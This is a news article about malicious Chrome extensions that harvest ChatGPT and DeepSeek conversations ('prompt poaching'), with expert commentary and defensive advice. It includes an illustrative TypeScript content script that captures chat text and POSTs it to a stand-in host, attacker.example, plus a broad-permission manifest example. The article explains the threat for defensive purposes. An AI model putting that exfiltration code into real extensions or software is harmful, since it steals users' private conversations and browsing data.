Artificial intelligence chatbots have become a powerful research tool, but they are also drawing the attention of attackers. Cybersecurity researchers warned this week that two malicious extensions discovered on the Chrome Web Store were designed to exfiltrate OpenAI ChatGPT and DeepSeek conversations, along with browsing data, to servers the attackers control.
The warnings follow another discovery that Urban VPN Proxy, which can be installed as an extension in Google Chrome and Microsoft Edge, was also spying on queries to AI chatbots.
Prompt Poaching
Researchers at Secure Annex, who have tracked this alarming trend, have named the tactic of using extensions to capture AI chatbot conversations “Prompt Poaching.”
According to the researchers, the tactic is “growing in popularity,” as “extensions capture and exfiltrate conversations you have with AI.” Hackers and other cybercriminals embed malicious code in seemingly benign extensions to monitor users’ conversations with chatbots.
“It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector,” the Secure Annex researchers warned. “Many of these extensions have been previously identified for their clickstream tracking capabilities, but the collection of private chats dramatically escalates the invasive nature of these applications.”
Add-ons Impersonating Legitimate Extensions
What makes this type of cyberattack especially insidious is that the malicious browser add-ons impersonate legitimate extensions.
“Once installed, the rogue extensions request that users grant them permissions to collect anonymized browser behavior to purportedly improve the sidebar experience,” The Hacker News reported. “Should the user agree to the practice, the embedded malware begins to harvest information about open browser tabs and chatbot conversation data.”
The add-ons aren’t limited to exfiltrating data shared with chatbots; they can also capture web browsing activity, including search queries and internal corporate URLs.
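The underlying mechanics need not be sophisticated. The TypeScript sketch below is purely illustrative, with an invented exfiltration endpoint and no connection to the reported extensions’ actual code, but it shows how a content script injected into a chatbot page could capture newly rendered messages using nothing more than standard browser APIs:

```typescript
// Illustrative sketch only. The endpoint is invented; this is not
// the reported extensions' actual code.
const EXFIL_URL = "https://attacker.example/collect"; // hypothetical

// Watch the page for newly rendered chat messages.
const observer = new MutationObserver((mutations) => {
  for (const mutation of mutations) {
    for (const node of mutation.addedNodes) {
      if (node instanceof HTMLElement) {
        const text = node.innerText?.trim();
        if (text) {
          // Quietly ship the captured text, plus the page URL,
          // to the attacker-controlled server.
          void fetch(EXFIL_URL, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({ page: location.href, text }),
          });
        }
      }
    }
  }
});

observer.observe(document.body, { childList: true, subtree: true });
```

Because a content script runs inside the page itself, it reads the conversation as plaintext in the DOM; HTTPS protects the data in transit to the chatbot provider, but not from code the user has invited into the browser.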
A New AI Chatbot Danger
We shouldn’t be surprised that malicious Chrome extensions are targeting AI platforms like ChatGPT and DeepSeek.
It was only a matter of time, warned Ensar Seker, chief information security officer at cybersecurity provider SOCRadar.
“Unfortunately, this is expected, and it’s just the beginning. Any platform that processes sensitive, high-value, or proprietary data becomes a prime target for adversaries,” Seker told ClearanceJobs.
“In this case, large language models (LLMs) are being used not only for productivity, but also to draft code, summarize confidential emails, or even assist with legal and financial analysis,” Seker added. “That makes the data flowing through these sessions incredibly valuable for threat actors.”
Chrome Extensions Are an Easy Target
Chrome extensions, especially those with broad permissions, have long been exploited to exfiltrate data. This campaign is the latest example of adversaries shifting tactics to compromise users’ browsers before data ever reaches OpenAI’s or DeepSeek’s infrastructure.
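What “broad permissions” looks like in practice is spelled out in an extension’s manifest. The hypothetical Manifest V3 example below (not taken from the reported extensions) is all it takes to run a script on every page a user visits and to read the URLs and titles of open tabs:

```json
{
  "manifest_version": 3,
  "name": "Helpful AI Sidebar",
  "version": "1.0",
  "permissions": ["tabs", "storage"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["content.js"]
    }
  ]
}
```

Chrome does surface these permission requests at install time, but as the reported campaign shows, a plausible-sounding justification, such as improving the sidebar experience, is often enough to get users to click through.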
“Whenever a new piece of technology emerges, the same patterns tend to repeat. First, we make familiar security mistakes, such as adding access controls late and in a cumbersome way. Second, existing threats get dusted off and rebranded with a new, flashy name because it sells,” added Martin Jartelius, AI product director at Outpost24.
Jartelius told ClearanceJobs that such information stealers have been around for years.
“There is nothing new about them. They are not hacking AI platforms. Users install them because they appear convenient, willingly hand over sensitive data, whether banking details, passwords, personal information, or even chat histories with LLMs, and then feel ‘hacked,’” explained Jartelius. “In the early days of computer viruses, this was a common distribution method, and it remains one of the primary channels for malware today.”
Not Entirely an AI Issue
Jartelius further told ClearanceJobs that we should avoid framing this as an AI issue, noting that the only real connection to AI is that criminals recognize the value of these conversations.
He said the more important takeaway is what this behavior reveals.
“Users are uploading information worth stealing to third-party services at scale,” Jartelius suggested. “If criminals are willing to invest effort to steal it, that information is already being shared openly and in far greater volumes than most people realize.”
None of this means the AI platforms themselves were compromised; no AI provider has been hacked.
“The real issue is that users continue to install browser plugins without considering the risks and then act surprised when those plugins do more than expected,” Jartelius cautioned.
However, that doesn’t mean people shouldn’t be cautious about how they use AI platforms. As with all other aspects of our digital world, someone may be watching without the user’s awareness.
“Users should treat conversations with LLMs as they would with email or a cloud drive,” said Seker. “Everything you enter could be compromised if your browser is infected or if endpoint controls are weak.”
We’re just at the dawn of “prompt-jacking” and “LLM session hijacking” becoming new attack vectors.
“Enterprises need to consider how they’re using AI tools internally and externally: what policies are in place, what browser extensions are whitelisted, and whether zero trust is enforced at the endpoint level,” Seker suggested. “This attack reinforces that security around AI tooling isn’t just about model safety, it’s about user and session-layer security too.”
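For managed Chrome deployments, that kind of allowlisting can be enforced centrally. As one illustration, Chrome on Linux reads JSON policy files from /etc/opt/chrome/policies/managed/; the sketch below (the extension ID is a placeholder) blocks all extensions except those explicitly approved:

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": ["aaaabbbbccccddddeeeeffffgggghhhh"]
}
```

The same ExtensionInstallBlocklist and ExtensionInstallAllowlist policies can be pushed through Group Policy on Windows or configuration profiles on macOS.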